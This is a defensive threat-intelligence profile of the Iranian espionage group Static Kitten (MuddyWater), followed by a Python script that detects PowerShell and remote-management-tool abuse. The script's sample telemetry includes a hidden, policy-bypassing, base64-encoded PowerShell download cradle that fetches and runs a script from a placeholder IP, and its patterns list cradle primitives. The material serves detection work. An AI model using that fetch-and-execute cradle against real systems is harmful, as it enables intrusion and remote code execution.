Static Kitten, also known as MuddyWater, Seedworm, TEMP.Zagros, and Mercury, is an Iranian state-sponsored cyberespionage group that has operated since at least 2017. It has been publicly attributed to Iran's Ministry of Intelligence and Security (MOIS), including by U.S. Cyber Command in 2022. The group employs a range of tactics and techniques, including spear-phishing campaigns, PowerShell-based backdoors, and Android spyware, to target governments, academia, telecommunications, and NGOs, primarily in the Middle East and Central Asia.
Static Kitten’s primary motivation is to conduct espionage, focusing on intelligence gathering for geopolitical and economic advantages. This includes stealing sensitive data and intellectual property from strategic entities.
To achieve its espionage objectives, Static Kitten relies on social engineering, chiefly spear-phishing emails carrying malicious documents or links. The group also abuses legitimate services, hosting payloads on file-sharing platforms and using commercial remote management tools for covert access, so that its activity blends in with ordinary IT traffic.
Static Kitten's toolset includes the POWERSTATS and NTSTATS PowerShell backdoors, Android spyware (e.g., DCHSpy), and the custom BugSleep implant (also tracked as MuddyRot). Alongside this custom malware, it delivers legitimate remote management software such as ScreenConnect, typically as MSI installers hosted on file-sharing services, so that its remote access looks like sanctioned administration and evades detection.
One significant campaign in 2021 targeted government agencies in Kuwait and the UAE with lures themed on ministries of foreign affairs, including Israeli-themed decoys, that led recipients to install ScreenConnect. More recently, in 2024, Static Kitten introduced a new command-and-control (C2) framework, DarkBeatC2, and deployed the BugSleep (MuddyRot) implant against targets in Israel and other strategic regions.
To date, there have been no confirmed arrests or law enforcement actions targeting Static Kitten, reflecting the challenges of addressing state-sponsored cyber threats at an international level.
Implement strong email security, including filtering phishing attempts and blocking malicious attachments.
Monitor for unusual use of remote management tools and PowerShell: for example, RMM installers such as ScreenConnect run from user-writable paths outside change control, and PowerShell launched from Office applications or with hidden windows, execution-policy bypass, or encoded commands.
Bolster mobile security by restricting apps from untrusted sources.
Patch known vulnerabilities promptly to limit exposure.
Leverage Huntress tools to detect persistence mechanisms and uncover malicious activities.
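The monitoring recommendation above can be turned into concrete detection logic. The following is an added example written for this page; it is not Huntress code and not a sample of the group's tooling. It assumes process-creation telemetry already normalized into JSON lines with ts, parent, image and cmdline fields (a stand-in for Sysmon Event ID 1 or Windows Security 4688 data). The sample events, the 198.51.100.7 address and the RMM product list are constructed for illustration.

```python
"""Flag PowerShell and RMM-installer abuse of the kind described above.

Added example, not Huntress or MuddyWater code. Input is assumed to be
JSON lines with ts/parent/image/cmdline (constructed stand-in for Sysmon
Event ID 1 / Windows 4688 process-creation events).
"""
import base64
import json
import re

# -e, -ec, -enc, -EncodedCommand followed by a base64 blob (16+ chars).
ENCODED_RE = re.compile(
    r"(?:^|\s)-e(?:c|n|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
# Common download-cradle / inline-execution primitives in decoded scripts.
CRADLE_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|net\.webclient|\biex\b|invoke-expression", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
BYPASS_RE = re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.I)
# Assumed starting list of RMM installer names; extend to what your estate does not sanction.
RMM_RE = re.compile(r"screenconnect|connectwise", re.I)
# User-writable locations: an RMM package here was not pushed by software deployment.
USER_PATH_RE = re.compile(r"\\users\\|\\temp\\|\\appdata\\", re.I)
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}


def encode_powershell(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent or undecodable."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    return raw.decode("utf-16le", errors="replace")


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_event(ev: dict) -> list:
    """Return the names of the rules a single process-creation event trips."""
    image = _basename(ev.get("image", ""))
    parent = _basename(ev.get("parent", ""))
    cmdline = ev.get("cmdline", "")
    hits = []
    if image in POWERSHELL:
        if parent in OFFICE_PARENTS:          # macro/doc-spawned PowerShell
            hits.append("ps_office_parent")
        if HIDDEN_RE.search(cmdline) and BYPASS_RE.search(cmdline):
            hits.append("ps_hidden_bypass")
        decoded = decode_encoded_command(cmdline)
        if decoded and CRADLE_RE.search(decoded):
            hits.append("ps_encoded_download_cradle")
    elif image == "msiexec.exe" and RMM_RE.search(cmdline) and USER_PATH_RE.search(cmdline):
        hits.append("rmm_installer_from_user_path")
    return hits


def scan(lines) -> list:
    """Run every rule over JSON-lines telemetry; return only events with hits."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        hits = analyze_event(ev)
        if hits:
            findings.append({"ts": ev.get("ts"), "image": ev.get("image"),
                             "rules": hits,
                             "decoded": decode_encoded_command(ev.get("cmdline", ""))})
    return findings


# Constructed sample telemetry: one Office-spawned encoded cradle, one RMM install
# from Downloads, and two benign events that must not fire. 198.51.100.7 is a
# documentation (TEST-NET-2) address, not a real indicator.
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/update.ps1')"
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
_MSI = r"C:\Windows\System32\msiexec.exe"
SAMPLE_EVENTS = [
    {"ts": "2024-07-15T09:12:01Z", "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": _PS, "cmdline": f"powershell.exe -nop -w hidden -ep bypass -enc {encode_powershell(_CRADLE)}"},
    {"ts": "2024-07-15T09:14:40Z", "parent": r"C:\Windows\explorer.exe",
     "image": _MSI, "cmdline": r'msiexec.exe /i "C:\Users\analyst\Downloads\ScreenConnect.ClientSetup.msi" /quiet'},
    {"ts": "2024-07-15T09:20:05Z", "parent": r"C:\Windows\System32\svchost.exe",
     "image": _PS, "cmdline": "powershell.exe -NoProfile -Command Get-Service wuauserv"},
    {"ts": "2024-07-15T09:31:17Z", "parent": r"C:\Windows\System32\services.exe",
     "image": _MSI, "cmdline": r'msiexec.exe /i "C:\Windows\ccmcache\a1\7zip.msi" /qn'},
]
SAMPLE_LOG = "\n".join(json.dumps(e) for e in SAMPLE_EVENTS)

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG.splitlines()):
        print(json.dumps(finding))
```

The encoded-command rule decodes the payload before matching, because base64 over UTF-16LE hides the cradle strings from plain keyword searches on the command line; the RMM rule keys on where the package came from rather than on the product name alone, since the same ScreenConnect MSI is legitimate when pushed by your deployment tooling from a managed path.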